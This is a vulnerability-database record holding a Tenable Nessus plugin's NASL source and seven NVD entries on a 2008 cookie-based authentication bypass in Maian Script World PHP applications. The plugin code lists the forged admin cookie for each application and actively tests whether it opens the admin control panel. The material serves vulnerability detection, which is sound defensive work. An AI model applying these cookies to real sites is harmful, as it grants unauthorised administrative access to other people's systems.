DATABASE RESOURCES PRICING ABOUT US

{"id": "MAIAN_COOKIE_AUTH_BYPASS.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Maian Scripts Cookie Manipulation Authentication Bypass", "description": "The remote host is running at least one PHP application from Maian Script World that allows a remote attacker to bypass authentication and access the admin control panel by simply setting a special cookie.", "published": "2008-07-15T00:00:00", "modified": "2022-04-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/33483", "reporter": "This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3319", "http://www.nessus.org/u?8d1af886", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3321"], "cvelist": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322", "CVE-2008-7086"], "immutableFields": [], "lastseen": "2022-04-12T15:36:37", "viewCount": 2023, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322", "CVE-2008-7086"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2008-3317", "CVE-2008-3318", "CVE-2008-3319", "CVE-2008-3320", "CVE-2008-3321", "CVE-2008-3322"]}, {"type": "nessus", "idList": ["HTTP_VERSION.NASL"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "33483", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33483);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2008-3317\",\n \"CVE-2008-3318\",\n \"CVE-2008-3319\",\n \"CVE-2008-3320\",\n \"CVE-2008-3321\",\n \"CVE-2008-3322\",\n \"CVE-2008-7086\"\n );\n script_bugtraq_id(\n 30195,\n 30196,\n 30197,\n 30198,\n 30199,\n 30203,\n 30205,\n 30208,\n 30209,\n 30210,\n 30211\n );\n script_xref(name:\"EDB-ID\", value:\"6047\");\n script_xref(name:\"EDB-ID\", value:\"6048\");\n script_xref(name:\"EDB-ID\", value:\"6049\");\n script_xref(name:\"EDB-ID\", value:\"6050\");\n script_xref(name:\"EDB-ID\", value:\"6051\");\n script_xref(name:\"EDB-ID\", value:\"6061\");\n script_xref(name:\"EDB-ID\", value:\"6062\");\n script_xref(name:\"EDB-ID\", value:\"6063\");\n script_xref(name:\"EDB-ID\", value:\"6064\");\n script_xref(name:\"EDB-ID\", value:\"6065\");\n script_xref(name:\"EDB-ID\", value:\"6066\");\n script_xref(name:\"SECUNIA\", value:\"31038\");\n script_xref(name:\"SECUNIA\", value:\"31056\");\n\n script_name(english:\"Maian Scripts Cookie Manipulation Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains at least one PHP application that\nallows a remote attacker to bypass authentication.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running at least one PHP application from Maian\nScript World that allows a remote attacker to bypass authentication\nand access the admin control panel by simply setting a special cookie.\");\n # http://web.archive.org/web/20120226153853/http://www.maianscriptworld.co.uk/free-php-scripts/maian-weblog/development/index.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d1af886\");\n script_set_attribute(attribute:\"solution\", value:\n\"Download the update-14-7-08 security patch and follow the instructions\nin the readme to update the vulnerable application(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_cwe_id(287);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Map apps to cookies.\nadmin_md5 = hexstr(MD5(\"admin\"));\ncookie[\"Maian Cart\"] = string(\"mccart_cookie=\", admin_md5);\ncookie[\"Maian Events\"] = string(\"mevents_admin_cookie=\", admin_md5);\ncookie[\"Maian Gallery\"] = string(\"mgallery_admin_cookie=\", admin_md5);\ncookie[\"Maian Greetings\"] = string(\"mecard_admin_cookie=1\");\ncookie[\"Maian Guestbook\"] = string(\"gbook_cookie=1\");\ncookie[\"Maian Links\"] = string(\"links_cookie=1\");\ncookie[\"Maian Music\"] = string(\"mmusic_cookie=\", admin_md5);\ncookie[\"Maian Recipe\"] = string(\"recipe_cookie=1\");\ncookie[\"Maian Search\"] = string(\"search_cookie=1\");\ncookie[\"Maian Uploader\"] = string(\"uploader_cookie=1\");\ncookie[\"Maian Weblog\"] = string(\"weblog_cookie=1\");\n\n\n# Loop through various directories.\nif (thorough_tests) dirs = make_list(\n \"/cart\",\n \"/events\",\n \"/gallery\",\n \"/greetings\",\n \"/guestbook\",\n \"/links\",\n \"/music\",\n \"/recipe\",\n \"/search\",\n \"/uploader\",\n \"/weblog\",\n cgi_dirs()\n);\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Try to pull up the login page for the administration control panel.\n url = string(dir, \"/admin/index.php\");\n\n clear_cookiejar();\n r = http_send_recv3(method: \"GET\", item:string(url, \"?cmd=login\"), port:port);\n if (isnull(r)) exit(0);\n\n # If it's one of the Maian scripts...\n pat = \"<title>(Maian [^ ]+) v[0-9]+\\.\";\n matches = egrep(pattern:pat, string:r[2]);\n if (matches)\n {\n # Identify the application.\n app = NULL;\n\n foreach match (split(matches))\n {\n match = chomp(match);\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n app = item[1];\n break;\n }\n }\n\n # Determine which cookie to use.\n if (cookie[app])\n {\n v = split(cookie[app], sep: '=', keep: 0);\n set_http_cookie(name: v[0], value: v[1]);\n # Try to exploit the issue to gain access to the admin control panel.\n url = string(url, \"?cmd=home\");\n r = http_send_recv3(method: \"GET\", item:url, port:port);\n if (isnull(r)) exit(0);\n\n # There's a problem if we now have access to the admin control panel.\n if (\n (\n # nb: this actually appears in Maian Greetings!\n \" - Adminstration</title>\" >< r[2] ||\n \" - Administration</title>\" >< r[2]\n ) &&\n '=\"index.php?cmd=logout\"' >< r[2]\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"Nessus was able to gain access to the administration control panel\\n\",\n \"for \", app, \" on the remote host using the following URL :\\n\",\n \"\\n\",\n \" \", build_url(port:port, qs:url), \"\\n\",\n \"\\n\",\n \"and setting the following cookie :\\n\",\n \"\\n\",\n \" Cookie: \", cookie[app], \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n # nb: don't break - there still may be other vulnerable apps installed.\n }\n }\n }\n}\n", "naslFamily": "CGI abuses", "cpe": [], "solution": "Download the update-14-7-08 security patch and follow the instructions in the readme to update the vulnerable application(s).", "nessusSeverity": "High", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}

{"cve": [{"lastseen": "2022-03-23T12:31:29", "description": "admin/index.php in Maian Uploader 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary uploader_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3321", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3321"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian_script_world:maian_uploader:4.0"], "id": "CVE-2008-3321", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3321", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian_script_world:maian_uploader:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:31", "description": "admin/index.php in Maian Recipe 1.2 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary recipe_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3322", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3322"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:recipe:1.2"], "id": "CVE-2008-3322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3322", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:recipe:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:28", "description": "admin/index.php in Maian Guestbook 3.2 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary gbook_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3320", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3320"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:guestbook:3.2"], "id": "CVE-2008-3320", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3320", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:guestbook:3.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:19:01", "description": "Maian Greetings 2.1 allows remote attackers to bypass authentication and gain administrative privileges by setting the mecard_admin_cookie cookie to admin.", "cvss3": {}, "published": "2009-08-26T14:24:00", "type": "cve", "title": "CVE-2008-7086", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7086"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:maianscriptworld:maian_greetings:2.1"], "id": "CVE-2008-7086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7086", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maianscriptworld:maian_greetings:2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:26", "description": "admin/index.php in Maian Links 3.1 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary links_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3319", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3319"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:links:3.1"], "id": "CVE-2008-3319", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3319", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:links:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:22", "description": "admin/index.php in Maian Search 1.1 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary search_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3317", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3317"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:maian_script_world:maian_search:1.0", "cpe:/a:maian_script_world:maian_search:1.1"], "id": "CVE-2008-3317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3317", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian_script_world:maian_search:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:maian_script_world:maian_search:1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:31:24", "description": "admin/index.php in Maian Weblog 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary weblog_cookie cookie.", "cvss3": {}, "published": "2008-07-25T16:41:00", "type": "cve", "title": "CVE-2008-3318", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3318"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:maian:weblog:3.1", "cpe:/a:maian:weblog:4.0"], "id": "CVE-2008-3318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3318", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:maian:weblog:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:maian:weblog:4.0:*:*:*:*:*:*:*"]}]}